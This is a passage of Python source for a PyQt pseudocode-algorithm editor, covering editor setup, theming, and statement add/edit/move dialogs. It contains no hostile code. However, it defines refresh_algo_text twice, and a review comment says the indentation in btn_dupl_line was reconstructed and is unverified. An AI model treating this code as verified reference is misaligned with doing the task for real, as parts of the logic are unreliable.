    ExecState.current_output = ""
    if not AppState.mode_python:
        set_current_line(None)
    update_output()
    plot_reset()


def print_output():
    """Developer helper: dump palette colors and reload the 'devtest' theme."""
    print(dir(GuiState.code_editor))
    p = QGuiApplication.palette()
    print(p.color(QPalette.Window).name())
    print(p.color(QPalette.WindowText).name())
    print(p.color(QPalette.Disabled, QPalette.WindowText).name())
    print(p.color(QPalette.Base).name())
    print(p.color(QPalette.AlternateBase).name())
    print(p.color(QPalette.ToolTipBase).name())
    print(p.color(QPalette.ToolTipText).name())
    print(p.color(QPalette.Text).name())
    print(p.color(QPalette.Disabled, QPalette.Text).name())
    print(p.color(QPalette.Dark).name())
    print(p.color(QPalette.Shadow).name())
    print(p.color(QPalette.Button).name())
    print(p.color(QPalette.ButtonText).name())
    print(p.color(QPalette.Disabled, QPalette.ButtonText).name())
    print(p.color(QPalette.BrightText).name())
    print(p.color(QPalette.Link).name())
    print(p.color(QPalette.Highlight).name())
    print(p.color(QPalette.Disabled, QPalette.Highlight).name())
    print(p.color(QPalette.HighlightedText).name())
    print(p.color(QPalette.Disabled, QPalette.HighlightedText).name())
    theming.themes["devtest"] = (theming.themes["devtest"][0],
                                 GuiState.code_editor.toPlainText().split("\n"))
    set_theme("devtest")
def load_editor_actions():
    """Copy/translate editor and search-panel actions after a language change."""
    for ours, theirs in GuiState.editor_action_table:
        copy_action(getattr(GuiState.ui, "action" + ours), getattr(GuiState.code_editor, "action_" + theirs))
    # edge cases
    copy_action(GuiState.ui.actionFind, GuiState.panel_search.menu.menuAction())
    GuiState.code_editor._sub_menus["Advanced"].setTitle(translate("MainWindow", "Advanced"))
    GuiState.mode_zoom.mnu_zoom.setTitle(translate("MainWindow", "Zoom"))
    GuiState.panel_folding.context_menu.setTitle(translate("MainWindow", "Folding"))
    GuiState.panel_folding.context_menu.actions()[0].setText(translate("MainWindow", "Collapse"))
    GuiState.panel_folding.context_menu.actions()[1].setText(translate("MainWindow", "Expand"))
    GuiState.panel_folding.context_menu.actions()[3].setText(translate("MainWindow", "Collapse all"))
    GuiState.panel_folding.context_menu.actions()[4].setText(translate("MainWindow", "Expand all"))
    GuiState.mode_ext_select.action_select_word.setText(translate("MainWindow", "Select word"))
    GuiState.mode_ext_select.action_select_extended_word.setText(translate("MainWindow", "Select extended word"))
    GuiState.mode_ext_select.action_select_matched.setText(translate("MainWindow", "Matched select"))
    GuiState.mode_ext_select.action_select_line.setText(translate("MainWindow", "Select line"))
    GuiState.mode_ext_select.action_select_line.associatedWidgets()[0].setTitle(translate("MainWindow", "Select"))
    GuiState.panel_search.labelSearch.setPixmap(GuiState.ui.actionFind.icon().pixmap(16, 16))
    GuiState.panel_search.labelSearch.setMaximumSize(QSize(16, 16))
    GuiState.panel_search.labelReplace.setPixmap(GuiState.ui.actionReplace.icon().pixmap(16, 16))
    GuiState.panel_search.labelReplace.setMaximumSize(QSize(16, 16))
    GuiState.panel_search.toolButtonPrevious.setIcon(QIcon(":/action/media/up.png"))
    GuiState.panel_search.toolButtonNext.setIcon(QIcon(":/action/media/down.png"))
    GuiState.panel_search.toolButtonClose.setIcon(QIcon(":/action/media/cross.png"))
    GuiState.panel_search.checkBoxRegex.setText(translate("MainWindow", "Regex"))
    GuiState.panel_search.checkBoxCase.setText(translate("MainWindow", "Match case"))
    GuiState.panel_search.checkBoxWholeWords.setText(translate("MainWindow", "Whole words"))
    GuiState.panel_search.checkBoxInSelection.setText(translate("MainWindow", "In Selection"))
    GuiState.panel_search.labelMatches.setText(translate("MainWindow", "0 matches"))
    GuiState.panel_search.toolButtonReplace.setText(translate("MainWindow", "Replace"))
    GuiState.panel_search.toolButtonReplaceAll.setText(translate("MainWindow", "Replace All"))
    GuiState.panel_search.lineEditSearch.prompt_text = translate("MainWindow", "Find")
    GuiState.panel_search.lineEditSearch.button.setIcon(QIcon(":/action/media/backspace.png"))
    GuiState.panel_search.lineEditSearch.button.setMinimumSize(QSize(21, 21))
    GuiState.panel_search.lineEditReplace.prompt_text = translate("MainWindow", "Replace")
    GuiState.panel_search.lineEditReplace.button.setIcon(QIcon(":/action/media/backspace.png"))


def copy_actions_to_editor(panel):
    """Expose the panel's QActions on the editor under action_* names."""
    for name, obj in panel.__dict__.items():
        if name.startswith("action_"):
            setattr(GuiState.code_editor, name, obj)
        elif name.startswith("action"):
            # workaround for shitty naming by the devs
            setattr(GuiState.code_editor, "action_" + name[6:], obj)


def set_theme(theme):
    """Activate *theme*, falling back to 'default' when unknown or empty."""
    if theme not in theming.themes or not theming.themes[theme][1]:
        theme = "default"
    util.settings.setValue("app_theme", theme)
    theming.load_theme(theme)
    for act in GuiState.ui.menuChangeTheme.actions():
        act.setChecked(act.statusTip() == theme)
    refresh_algo()


def set_style(style):
    """Select the pygments style for the code editor and check its menu entry."""
    util.settings.setValue("editor_style", style)
    GuiState.syntax_highlighter.pygments_style = style
    for act in GuiState.ui.menuChangeStyle.actions():
        act.setChecked(act.text() == style)


def load_code_editor():
    """Create and wire up the pyqode-based Python code editor."""
    GuiState.code_editor = api.CodeEdit()
    if hasattr(sys, "frozen"):
        print("using external backend")
        # BUG FIX: an unexpected sys.platform used to leave `backend`
        # unbound (NameError); default to the bare unix executable name.
        if sys.platform == "win32":
            backend = "editor_backend.exe"
        else:
            backend = "editor_backend"
        backend = os.path.join(sys._MEIPASS, backend)
    else:
        print("using script file")
        while not async_imported("editor_backend"):
            QCoreApplication.processEvents()
        backend = globals()["editor_backend"].__file__
    GuiState.code_editor.backend.start(backend)
    GuiState.code_editor.modes.append(modes.CodeCompletionMode())
    GuiState.code_editor.modes.append(modes.CaretLineHighlighterMode())
    GuiState.code_editor.modes.append(modes.AutoCompleteMode())
    GuiState.code_editor.modes.append(modes.IndenterMode())
    GuiState.code_editor.modes.append(modes.AutoIndentMode())
    GuiState.code_editor.modes.append(modes.OccurrencesHighlighterMode())
    GuiState.code_editor.modes.append(modes.SmartBackSpaceMode())
    GuiState.code_editor.modes.append(modes.SymbolMatcherMode())
    GuiState.mode_zoom = modes.ZoomMode()
    GuiState.code_editor.modes.append(GuiState.mode_zoom)
    GuiState.code_editor.action_zoom_in = GuiState.mode_zoom.mnu_zoom.actions()[0]
    GuiState.code_editor.action_zoom_out = GuiState.mode_zoom.mnu_zoom.actions()[1]
    GuiState.code_editor.action_reset_zoom = GuiState.mode_zoom.mnu_zoom.actions()[2]
    GuiState.mode_ext_select = GuiState.code_editor.modes.append(modes.ExtendedSelectionMode())
    GuiState.syntax_highlighter = GuiState.code_editor.modes.append(
        modes.PygmentsSyntaxHighlighter(GuiState.code_editor.document()))
    GuiState.syntax_highlighter.fold_detector = api.IndentFoldDetector()
    GuiState.panel_folding = GuiState.code_editor.panels.append(panels.FoldingPanel())
    GuiState.code_editor.panels.append(panels.LineNumberPanel())
    GuiState.code_editor.modes.append(modes.CheckerMode(pyqode.python.backend.run_pep8))
    GuiState.code_editor.panels.append(panels.GlobalCheckerPanel(), panels.GlobalCheckerPanel.Position.LEFT)
    GuiState.panel_search = GuiState.code_editor.panels.append(panels.SearchAndReplacePanel(),
                                                               api.Panel.Position.BOTTOM)
    GuiState.panel_search._update_label_matches_orig = GuiState.panel_search._update_label_matches

    def wrapper():
        # Re-translate the "n matches" label after the panel updates it.
        GuiState.panel_search._update_label_matches_orig()
        if GuiState.panel_search.labelMatches.text():
            GuiState.panel_search.labelMatches.setText(
                translate("MainWindow", "{num} matches").format(num=GuiState.panel_search.cpt_occurences))

    GuiState.panel_search._update_label_matches = wrapper
    copy_actions_to_editor(GuiState.panel_search)
    GuiState.code_editor.textChanged.connect(refresh)
    load_editor_actions()

    def make_style_handler(s):
        return lambda: set_style(s)

    for style in pygments.styles.get_all_styles():
        action = QAction(GuiState.window)
        action.setText(style)
        action.setCheckable(True)
        action.triggered.connect(make_style_handler(style))
        GuiState.ui.menuChangeStyle.addAction(action)
    GuiState.syntax_highlighter.pygments_style = util.settings.value("editor_style", "default")
    set_style(GuiState.syntax_highlighter.pygments_style)
    GuiState.ui.verticalLayout_8.addWidget(GuiState.code_editor)


def load_plot_canvas():
    """Create the matplotlib figure/canvas and add it to the layout."""
    GuiState.plot_figure = Figure()
    GuiState.plot_axes = GuiState.plot_figure.add_subplot(111)
    GuiState.plot_canvas = FigureCanvas(GuiState.plot_figure)
    plot_reset()
    GuiState.ui.verticalLayout_4.addWidget(GuiState.plot_canvas)


def get_item_label(item):
    """Attach a clickable label widget to a tree item and return it."""
    def make_select_handler(it):
        return lambda: GuiState.ui.treeWidget.setCurrentItem(it)

    txt = QClickableLabel()
    txt.setStyleSheet(GuiState.ui.treeWidget.styleSheet())
    txt.clicked.connect(make_select_handler(item))
    txt.dclicked.connect(algo_double_click)
    item.lbl = txt
    GuiState.ui.treeWidget.setItemWidget(item, 0, txt)
    return txt


def get_item_html(html, data=""):
    """Create a tree item whose label renders the given HTML fragment."""
    item = QTreeWidgetItem()
    item.setStatusTip(0, data)
    item.setFont(0, GuiState.ui.treeWidget.font())
    lbl = get_item_label(item)
    lbl.setFont(item.font(0))
    lbl.setText(label_format % html)
    item.setSizeHint(0, lbl.sizeHint())
    GuiState.ui.treeWidget.setItemWidget(item, 0, lbl)
    return item, lbl


def refresh_algo_text():
    """Regenerate the label text of every algorithm tree item."""
    for item, stmt in GuiState.item_map.values():
        lbl = get_item_label(item)
        lbl.setText(label_format % str_stmt(stmt))
def refresh_algo_text():
    """Re-render the label text of every statement item in the algo tree."""
    for item, stmt in GuiState.item_map.values():
        lbl = get_item_label(item)
        lbl.setText(label_format % str_stmt(stmt))


def add_display():
    """Prompt for a DISPLAY statement and append it at the current position."""
    from forms import alg_display
    dlg = alg_display.AlgoDisplayStmt(GuiState.window)
    if dlg.run():
        append_line(DisplayStmt(dlg.expr, dlg.newline))


def add_def_variable():
    """Prompt for a variable assignment and append it."""
    from forms import alg_define
    dlg = alg_define.AlgoDefineStmt(GuiState.window)
    if dlg.run():
        append_line(AssignStmt(dlg.varname, dlg.expr))


def add_input():
    """Prompt for an INPUT statement and append it."""
    from forms import alg_input
    dlg = alg_input.AlgoInputStmt(GuiState.window)
    if dlg.run():
        append_line(InputStmt(dlg.varname, dlg.expr, dlg.text))


def add_call():
    """Prompt for a CALL statement and append it."""
    from forms import alg_call
    dlg = alg_call.AlgoCallStmt(GuiState.window)
    if dlg.run():
        append_line(CallStmt(dlg.func, dlg.args))


def add_def_func():
    """Prompt for a FUNCTION definition (empty body) and append it."""
    from forms import alg_func
    dlg = alg_func.AlgoFuncStmt(GuiState.window)
    if dlg.run():
        append_line(FuncStmt(dlg.func, dlg.args, []))


def add_return():
    """Prompt for a RETURN statement and append it."""
    from forms import alg_return
    dlg = alg_return.AlgoReturnStmt(GuiState.window)
    if dlg.run():
        append_line(ReturnStmt(dlg.expr))


def add_if_block():
    """Prompt for an IF block (empty body) and append it."""
    from forms import alg_if
    dlg = alg_if.AlgoIfStmt(GuiState.window)
    if dlg.run():
        append_line(IfStmt(dlg.expr, []))


def add_else_block():
    """Append an empty ELSE block (no dialog needed)."""
    append_line(ElseStmt([]))


def add_for_loop():
    """Prompt for a FOR loop (empty body) and append it."""
    from forms import alg_for
    dlg = alg_for.AlgoForStmt(GuiState.window)
    if dlg.run():
        append_line(ForStmt(dlg.varname, dlg.f_from, dlg.f_to, [], dlg.f_step))


def add_while_loop():
    """Prompt for a WHILE loop (empty body) and append it."""
    from forms import alg_while
    dlg = alg_while.AlgoWhileStmt(GuiState.window)
    if dlg.run():
        append_line(WhileStmt(dlg.expr, []))


def add_gclear():
    """Append a CLEAR PLOT statement (no dialog needed)."""
    append_line(GClearStmt())


def add_gline():
    """Prompt for a DRAW LINE statement and append it."""
    from forms import alg_gline
    dlg = alg_gline.AlgoGLineStmt(GuiState.window)
    if dlg.run():
        append_line(GLineStmt(dlg.f_start_x, dlg.f_start_y, dlg.f_end_x, dlg.f_end_y, dlg.f_color))


def add_gpoint():
    """Prompt for a DRAW POINT statement and append it."""
    from forms import alg_gpoint
    dlg = alg_gpoint.AlgoGPointStmt(GuiState.window)
    if dlg.run():
        append_line(GPointStmt(dlg.f_x, dlg.f_y, dlg.f_color))


def add_gwindow():
    """Prompt for a SET WINDOW statement and append it."""
    from forms import alg_gwindow
    dlg = alg_gwindow.AlgoGWindowStmt(GuiState.window)
    if dlg.run():
        append_line(GWindowStmt(dlg.f_x_min, dlg.f_x_max, dlg.f_y_min, dlg.f_y_max, dlg.f_x_grad, dlg.f_y_grad))


def add_gfunc():
    """Prompt for a PLOT FUNCTION statement and append it."""
    from forms import alg_gfunc
    dlg = alg_gfunc.AlgoGFuncStmt(GuiState.window)
    if dlg.run():
        append_line(GFuncStmt(dlg.f_variable, dlg.f_function, dlg.f_start, dlg.f_end, dlg.f_step, dlg.f_color))


def add_break_stmt():
    """Append a BREAK statement (no dialog needed)."""
    append_line(BreakStmt())


def add_continue_stmt():
    """Append a CONTINUE statement (no dialog needed)."""
    append_line(ContinueStmt())


def add_stop_stmt():
    """Prompt for a STOP statement and append it."""
    from forms import alg_stop
    dlg = alg_stop.AlgoStopStmt(GuiState.window)
    if dlg.run():
        append_line(StopStmt(dlg.expr))


def add_sleep_stmt():
    """Prompt for a WAIT/SLEEP statement and append it."""
    from forms import alg_sleep
    dlg = alg_sleep.AlgoSleepStmt(GuiState.window)
    if dlg.run():
        append_line(SleepStmt(dlg.expr))


def add_comment_stmt():
    """Prompt for a comment and append it."""
    from forms import alg_comment
    dlg = alg_comment.AlgoCommentStmt(GuiState.window)
    if dlg.run():
        append_line(CommentStmt(dlg.comment))


def btn_dupl_line():
    """Duplicate the selected statement.

    eval(repr(stmt)) is used as a deep-copy of the statement tree; for an IF
    with an attached ELSE sibling, the ELSE is duplicated first so the pair
    stays together.
    """
    stmt = get_current_stmt()
    if isinstance(stmt, IfStmt):
        current_pos = get_current_pos()
        _, parent_stmt = get_parent(current_pos)
        if current_pos[-1] + 1 < len(parent_stmt.children) and isinstance(parent_stmt.children[current_pos[-1] + 1], ElseStmt):
            append_line(eval(repr(parent_stmt.children[current_pos[-1] + 1])), True)
    # NOTE(review): indentation reconstructed — the final duplicate is assumed
    # to run for every statement kind, not only IfStmt. Verify against history.
    append_line(eval(repr(stmt)), True)


def btn_delete_line():
    """Delete the selected statement; an IF's trailing ELSE is removed with it."""
    current_pos = get_current_pos()
    _, parent_stmt = get_parent(current_pos)
    if isinstance(parent_stmt.children[current_pos[-1]], IfStmt) and current_pos[-1] < len(
            parent_stmt.children) - 1 and isinstance(parent_stmt.children[current_pos[-1] + 1], ElseStmt):
        # Delete the ElseStmt first so the index of the IfStmt stays valid.
        del parent_stmt.children[current_pos[-1] + 1]
    del parent_stmt.children[current_pos[-1]]
    refresh()


def btn_edit_line():
    """Open the matching edit dialog for the selected statement and apply changes.

    One isinstance branch per concrete statement type; each re-opens the same
    dialog used for creation, pre-filled with the statement's current fields.
    """
    stmt = get_current_stmt()
    if isinstance(stmt, DisplayStmt):
        from forms import alg_display
        dlg = alg_display.AlgoDisplayStmt(GuiState.window, (stmt.content.code(), stmt.newline))
        if dlg.run():
            stmt.content = dlg.expr
            stmt.newline = dlg.newline
    elif isinstance(stmt, CallStmt):
        from forms import alg_call
        dlg = alg_call.AlgoCallStmt(GuiState.window, (stmt.function.code(), [x.code() for x in stmt.arguments]))
        if dlg.run():
            stmt.function = dlg.func
            stmt.arguments = dlg.args
    elif isinstance(stmt, AssignStmt):
        from forms import alg_define
        dlg = alg_define.AlgoDefineStmt(GuiState.window, (stmt.variable.code(), stmt.value.code()))
        if dlg.run():
            stmt.variable = dlg.varname
            stmt.value = dlg.expr
    elif isinstance(stmt, ReturnStmt):
        from forms import alg_return
        dlg = alg_return.AlgoReturnStmt(GuiState.window, stmt.value.code() if stmt.value is not None else None)
        if dlg.run():
            stmt.value = dlg.expr
    elif isinstance(stmt, StopStmt):
        from forms import alg_stop
        dlg = alg_stop.AlgoStopStmt(GuiState.window, stmt.message.code() if stmt.message is not None else None)
        if dlg.run():
            stmt.message = dlg.expr
    elif isinstance(stmt, SleepStmt):
        from forms import alg_sleep
        dlg = alg_sleep.AlgoSleepStmt(GuiState.window, stmt.duration.code())
        if dlg.run():
            stmt.duration = dlg.expr
    elif isinstance(stmt, InputStmt):
        from forms import alg_input
        dlg = alg_input.AlgoInputStmt(GuiState.window, (stmt.variable.code(),
                                                        stmt.prompt.code() if stmt.prompt is not None else None,
                                                        stmt.text))
        if dlg.run():
            stmt.variable = dlg.varname
            stmt.prompt = dlg.expr
            stmt.text = dlg.text
    elif isinstance(stmt, IfStmt):
        from forms import alg_if
        dlg = alg_if.AlgoIfStmt(GuiState.window, stmt.condition.code())
        if dlg.run():
            stmt.condition = dlg.expr
    elif isinstance(stmt, WhileStmt):
        from forms import alg_while
        dlg = alg_while.AlgoWhileStmt(GuiState.window, stmt.condition.code())
        if dlg.run():
            stmt.condition = dlg.expr
    elif isinstance(stmt, ForStmt):
        from forms import alg_for
        dlg = alg_for.AlgoForStmt(GuiState.window, (
            stmt.variable, stmt.begin.code(), stmt.end.code(), stmt.step.code() if stmt.step is not None else None))
        if dlg.run():
            stmt.variable = dlg.varname
            stmt.begin = dlg.f_from
            stmt.end = dlg.f_to
            stmt.step = dlg.f_step
    elif isinstance(stmt, FuncStmt):
        from forms import alg_func
        dlg = alg_func.AlgoFuncStmt(GuiState.window, (stmt.name, stmt.parameters))
        if dlg.run():
            stmt.name = dlg.func
            stmt.parameters = dlg.args
    elif isinstance(stmt, CommentStmt):
        from forms import alg_comment
        dlg = alg_comment.AlgoCommentStmt(GuiState.window, stmt.content)
        if dlg.run():
            stmt.content = dlg.comment
    elif isinstance(stmt, GLineStmt):
        from forms import alg_gline
        dlg = alg_gline.AlgoGLineStmt(GuiState.window, (
            stmt.start_x.code(), stmt.start_y.code(), stmt.end_x.code(), stmt.end_y.code(), stmt.color.code()))
        if dlg.run():
            stmt.start_x = dlg.f_start_x
            stmt.start_y = dlg.f_start_y
            stmt.end_x = dlg.f_end_x
            stmt.end_y = dlg.f_end_y
            stmt.color = dlg.f_color
    elif isinstance(stmt, GPointStmt):
        from forms import alg_gpoint
        dlg = alg_gpoint.AlgoGPointStmt(GuiState.window, (stmt.x.code(), stmt.y.code(), stmt.color.code()))
        if dlg.run():
            stmt.x = dlg.f_x
            stmt.y = dlg.f_y
            stmt.color = dlg.f_color
    elif isinstance(stmt, GWindowStmt):
        from forms import alg_gwindow
        dlg = alg_gwindow.AlgoGWindowStmt(GuiState.window, (
            stmt.x_min.code(), stmt.x_max.code(), stmt.y_min.code(), stmt.y_max.code(), stmt.x_grad.code(),
            stmt.y_grad.code()))
        if dlg.run():
            stmt.x_min = dlg.f_x_min
            stmt.x_max = dlg.f_x_max
            stmt.y_min = dlg.f_y_min
            stmt.y_max = dlg.f_y_max
            stmt.x_grad = dlg.f_x_grad
            stmt.y_grad = dlg.f_y_grad
    elif isinstance(stmt, GFuncStmt):
        from forms import alg_gfunc
        dlg = alg_gfunc.AlgoGFuncStmt(GuiState.window, (
            stmt.var, stmt.expr.code(), stmt.start.code(), stmt.end.code(), stmt.step.code(), stmt.color.code()))
        if dlg.run():
            stmt.var = dlg.f_variable
            stmt.expr = dlg.f_function
            stmt.start = dlg.f_start
            stmt.end = dlg.f_end
            stmt.step = dlg.f_step
            stmt.color = dlg.f_color
    refresh()


def btn_move_up_block():
    """Move the selected statement up, skipping over whole blocks."""
    btn_move_up(True)


def btn_move_up(block=False):
    """Move the selected statement one slot up.

    With block=False the statement descends into the end of a preceding
    BlockStmt; with block=True it jumps over it.
    """
    current_pos = get_current_pos()
    _, parent_stmt = get_parent(current_pos)
    current_pos[-1] -= 1
    if current_pos[-1] < 0:
        # Already first in its block: move out into the parent's slot.
        current_pos.pop()
    else:
        if not block:
            existing = parent_stmt.children[current_pos[-1]]
            if isinstance(existing, BlockStmt):
                # Enter the previous block at its end.
                current_pos.append(len(existing.children))
    move_line(get_current_pos(), current_pos)
def btn_move_down_block():
    """Move the selected statement down, skipping over whole blocks."""
    btn_move_down(True)


def btn_move_down(block=False):
    """Move the selected statement one slot down.

    With block=False the statement descends into the start of a following
    BlockStmt; with block=True it jumps over it.
    """
    current_pos = get_current_pos()
    _, parent_stmt = get_parent(current_pos)
    current_pos[-1] += 1
    if current_pos[-1] >= len(parent_stmt.children):
        # Already last in its block: move out after the parent.
        current_pos.pop()
        current_pos[-1] += 1
    else:
        if not block:
            existing = parent_stmt.children[current_pos[-1]]
            if isinstance(existing, BlockStmt):
                # Enter the next block at its start.
                current_pos.append(0)
    move_line(get_current_pos(), current_pos)


def append_line(stmt, force_after=False):
    """Insert *stmt* relative to the current selection and select it.

    A placeholder (bare BaseStmt) under the cursor is replaced in place.
    If the selection is a BlockStmt, the new statement goes inside it
    (except an ElseStmt after an IfStmt, which must stay a sibling);
    force_after also skips past an IF's attached ELSE.
    """
    current_pos = get_current_pos()
    _, parent_stmt = get_parent(current_pos)
    if current_pos:
        existing = parent_stmt.children[current_pos[-1]]
        if type(existing) == BaseStmt:
            # Replace the empty placeholder line instead of inserting.
            parent_stmt.children[current_pos[-1]] = stmt
            refresh()
            return
    else:
        existing = AppState.algo
    if force_after and isinstance(existing, IfStmt) and current_pos[-1] + 1 < len(parent_stmt.children) and isinstance(
            parent_stmt.children[current_pos[-1] + 1], ElseStmt):
        current_pos[-1] += 1
    if not force_after and isinstance(existing, BlockStmt) \
            and not (isinstance(stmt, ElseStmt) and isinstance(existing, IfStmt)):
        current_pos.append(len(existing.children))
    else:
        current_pos[-1] += 1
    add_line(current_pos, stmt)
    if isinstance(stmt, BlockStmt):
        add_block(stmt, current_pos)
    set_current_stmt(stmt)


def get_current_stmt():
    """Return the statement bound to the selected tree item, or the root algo."""
    current_item = GuiState.ui.treeWidget.currentItem()
    if current_item is not None:
        for item, stmt in GuiState.item_map.values():
            if item == current_item:
                return stmt
    return AppState.algo


def get_current_pos():
    """Return the selected statement's position as a list of child indices.

    An empty list means the root. Performs a depth-first search of the
    statement tree, tracking the index path in *current*.
    """
    current = []
    found = False
    current_stmt = get_current_stmt()

    def find_block(block: BlockStmt):
        # Recursive DFS helper; mutates *current* and *found* in the closure.
        nonlocal found
        if found:
            return
        nonlocal current
        current.append(0)
        for child in block.children:
            if child == current_stmt:
                found = True
                return
            if isinstance(child, BlockStmt):
                find_block(child)
                if found:
                    return
            current[-1] += 1
        current.pop()

    if current_stmt is not None:
        find_block(AppState.algo)
    return current


def get_parent(pos):
    """Walk *pos* (minus its last index) and return (parent item, parent stmt)."""
    parent = GuiState.root_item
    parent_stmt = AppState.algo
    for p in pos[:-1]:
        parent = parent.child(p)
        parent_stmt = parent_stmt.children[p]
    return parent, parent_stmt


def set_current_stmt(current):
    """Select the tree item bound to *current* (no-op for None)."""
    if current is None:
        return
    for item, stmt in GuiState.item_map.values():
        if stmt == current:
            GuiState.ui.treeWidget.setCurrentItem(item)
            break


def refresh_algo():
    """Rebuild the whole tree from AppState.algo, preserving the selection."""
    current = None
    line = GuiState.ui.treeWidget.currentItem()
    for item, stmt in GuiState.item_map.values():
        if item == line:
            current = stmt
            break
    load_block(AppState.algo)
    set_current_stmt(current)


def move_line(old_pos, new_pos):
    """Move a statement from *old_pos* to *new_pos* in the model, then refresh."""
    _, old_parent_stmt = get_parent(old_pos)
    _, new_parent_stmt = get_parent(new_pos)
    line = old_parent_stmt.children[old_pos[-1]]
    del old_parent_stmt.children[old_pos[-1]]
    new_parent_stmt.children.insert(new_pos[-1], line)
    refresh()


def add_line(pos, stmt, add=True):
    """Create the tree item for *stmt* at *pos*; add=False skips the model insert."""
    parent, parent_stmt = get_parent(pos)
    item, lbl = get_item_html(str_stmt(stmt))
    parent.insertChild(pos[-1], item)
    if add:
        parent_stmt.children.insert(pos[-1], stmt)
    store_line(item, stmt)
    GuiState.ui.treeWidget.setItemWidget(item, 0, lbl)


def handler_UseArrowNotation():
    """Persist the arrow-notation toggle and re-render the algo tree."""
    util.settings.setValue("use_arrow_notation", GuiState.ui.actionUseArrowNotation.isChecked())
    refresh_algo()


def set_load_recent_articles(val):
    """Sync the menu checkbox and the persisted 'load_articles' setting."""
    GuiState.ui.actionLoadRecentArticles.setChecked(val)
    util.settings.setValue("load_articles", val)


def handler_LoadRecentArticles():
    """Menu handler: persist the current state of the articles checkbox."""
    set_load_recent_articles(GuiState.ui.actionLoadRecentArticles.isChecked())


def handler_CheckForUpdates():
    """Persist the update-check toggle; run an immediate check when enabled."""
    util.settings.setValue("check_for_updates", GuiState.ui.actionCheckForUpdates.isChecked())
    if GuiState.ui.actionCheckForUpdates.isChecked():
        run_updater()


def str_stmt(stmt):
    """Render *stmt* as rich-text HTML for the algo tree.

    Each branch builds a translated template using lightweight BB-style tags
    ([k]eyword, [b]lock, [c]ode, [i]talic, [t]comment, ...) which are replaced
    with HTML spans at the end.
    """
    code = lambda stmt: stmt.code(True)
    if isinstance(stmt, DisplayStmt):
        ret = translate("Algo", "[k]DISPLAY[/k] [c]{val}[/c] {newline}").format(val=code(stmt.content),
                                                                                newline="↵" if stmt.newline else "")
    elif isinstance(stmt, BreakStmt):
        ret = translate("Algo", "[k]BREAK[/k]")
    elif isinstance(stmt, ContinueStmt):
        ret = translate("Algo", "[k]CONTINUE[/k]")
    elif isinstance(stmt, ElseStmt):
        ret = translate("Algo", "[b]ELSE[/b]")
    elif isinstance(stmt, WhileStmt):
        ret = translate("Algo", "[b]WHILE[/b] [c]{cond}[/c]").format(cond=code(stmt.condition))
    elif isinstance(stmt, IfStmt):
        ret = translate("Algo", "[b]IF[/b] [c]{cond}[/c]").format(cond=code(stmt.condition))
    elif isinstance(stmt, InputStmt):
        ret = translate("Algo", "[k]INPUT[/k] [c]{prompt}[/c] [k]TO[/k] [c]{var}[/c] {text}").format(
            prompt="" if stmt.prompt is None else stmt.prompt.code(True),
            var=code(stmt.variable),
            text="⌘" if stmt.text else "")
    elif isinstance(stmt, AssignStmt):
        if stmt.value is None:
            ret = translate("Algo", "[k]DECLARE[/k] [c]{var}[/c]").format(var=stmt.variable)
        else:
            # Two spellings of assignment: arrow notation vs verbose wording.
            ret = (translate("Algo", "[c]{var}[/c] [k]&#129128;[/k] [c]{value}[/c]")
                   if GuiState.ui.actionUseArrowNotation.isChecked()
                   else translate("Algo", "[k]VARIABLE[/k] [c]{var}[/c] [k]TAKES VALUE[/k] [c]{value}[/c]")).format(
                var=code(stmt.variable), value=code(stmt.value))
    elif isinstance(stmt, CallStmt):
        ret = translate("Algo", "[k]CALL[/k] [c]{code}[/c]").format(code=code(stmt.to_node()))
    elif isinstance(stmt, ForStmt):
        ret = translate("Algo",
                        "[b]FOR[/b] [c]{var}[/c] [b]FROM[/b] [c]{begin}[/c] [b]TO[/b] [c]{end}[/c] {step}").format(
            var=stmt.variable, begin=code(stmt.begin), end=code(stmt.end),
            step="" if stmt.step is None else translate("Algo", "([b]STEP[/b] [c]{step}[/c])").format(
                step=code(stmt.step)))
    elif isinstance(stmt, FuncStmt):
        ret = translate("Algo", "[b]FUNCTION[/b] [c]{func}({args})[/c]").format(func=stmt.name,
                                                                                args=", ".join(stmt.parameters))
    elif isinstance(stmt, ReturnStmt):
        ret = translate("Algo", "[k]RETURN[/k] [c]{val}[/c]").format(
            val="" if stmt.value is None else code(stmt.value))
    elif isinstance(stmt, StopStmt):
        ret = translate("Algo", "[k]STOP[/k] [c]{val}[/c]").format(
            val="" if stmt.message is None else code(stmt.message))
    elif isinstance(stmt, SleepStmt):
        ret = translate("Algo", "[k]WAIT[/k] [c]{val}[/c] [k]SECONDS[/k]").format(val=code(stmt.duration))
    elif isinstance(stmt, CommentStmt):
        ret = "[t]{com}[/t]".format(com=util.html.sanitize(stmt.content))
    elif isinstance(stmt, GClearStmt):
        ret = translate("Algo", "[k]CLEAR PLOT[/k]")
    elif isinstance(stmt, GLineStmt):
        ret = translate("Algo",
                        "[k]DRAW LINE[/k] [c]{color}[/c] [k]FROM[/k] ([c]{start_x}[/c]; [c]{start_y}[/c]) [k]TO[/k] ([c]{end_x}[/c]; [c]{end_y}[/c])").format(
            color=code(stmt.color),
            start_x=code(stmt.start_x), start_y=code(stmt.start_y),
            end_x=code(stmt.end_x), end_y=code(stmt.end_y)
        )
    elif isinstance(stmt, GPointStmt):
        ret = translate("Algo", "[k]DRAW POINT[/k] [c]{color}[/c] [k]AT[/k] ([c]{x}[/c]; [c]{y}[/c])").format(
            color=code(stmt.color),
            x=code(stmt.x), y=code(stmt.y),
        )
    elif isinstance(stmt, GWindowStmt):
        ret = translate("Algo",
                        "[k]SET WINDOW[/k] [i]Xmin=[/i][c]{x_min}[/c] [i]Xmax=[/i][c]{x_max}[/c] [i]Ymin=[/i][c]{y_min}[/c] [i]Ymax=[/i][c]{y_max}[/c] [i]Xgrad=[/i][c]{x_grad}[/c] [i]Ygrad=[/i][c]{y_grad}[/c]").format(
            x_min=code(stmt.x_min), x_max=code(stmt.x_max),
            y_min=code(stmt.y_min), y_max=code(stmt.y_max),
            x_grad=code(stmt.x_grad), y_grad=code(stmt.y_grad),
        )
    elif isinstance(stmt, GFuncStmt):
        ret = translate("Algo",
                        "[k]PLOT FUNCTION[/k] [c]{color}[/c] [i]f[/i]({var}) = [c]{expr}[/c] [k]FROM[/k] [c]{begin}[/c] [k]TO[/k] [c]{end}[/c] [k]STEP[/k] [c]{step}[/c]").format(
            color=code(stmt.color), var=stmt.var, expr=code(stmt.expr),
            begin=code(stmt.start), end=code(stmt.end), step=code(stmt.step)
        )
    elif isinstance(stmt, BlockStmt):
        ret = translate("Algo", "[b]PROGRAM[/b]")
    elif isinstance(stmt, BaseStmt):
        ret = translate("Algo", "[i]empty[/i]")
    else:
        ret = "unimpl %s" % stmt
